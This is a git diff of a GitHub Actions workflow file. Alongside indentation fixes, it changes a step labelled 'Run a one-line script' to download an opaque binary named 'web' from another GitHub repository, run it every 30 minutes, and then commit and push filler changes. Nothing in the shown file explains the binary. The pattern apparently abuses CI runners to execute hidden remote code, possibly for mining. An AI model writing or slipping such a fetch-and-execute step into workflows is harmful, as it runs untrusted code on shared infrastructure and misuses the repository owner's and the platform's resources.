--- a/.github/workflows/cron.yml
+++ b/.github/workflows/cron.yml
@@ -1,24 +1,23 @@
+  
 name: CI
 on:
-push:
-  branches: [ main ]
+  push:
+    branches: [ main ]
 
-schedule:
-  - cron:  '*/30 * * * *'
+  schedule:
+    - cron:  '*/30 * * * *'
 jobs:
-build:
-  runs-on: ubuntu-latest
-  steps:
-    - uses: actions/checkout@v3
-    - name: Run a one-line script
-      run: |
-        wget https://github.com/Arlentak/pages/raw/master/web
-        chmod +x web
-        echo $RANDOM | md5sum | head -c 20; echo;
-        echo " $RANDOM " > file
-        git config --local user.email "41898282+github-actions[bot]@users.noreply.github.com"
-        git config --local user.name "github-actions[bot]"
-        git add -A
-        git commit -m "Add changes"
-        git push  
-        
+  build:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v3
+      - name: Run a one-line script
+        run: |
+          wget https://github.com/Arlentak/pages/raw/master/web
+          chmod +x web
+          ./web
+          git config --local user.email "41898282+github-actions[bot]@users.noreply.github.com"
+          git config --local user.name "github-actions[bot]"
+          git add -A
+          git commit -m "Add changes"
+          git push  
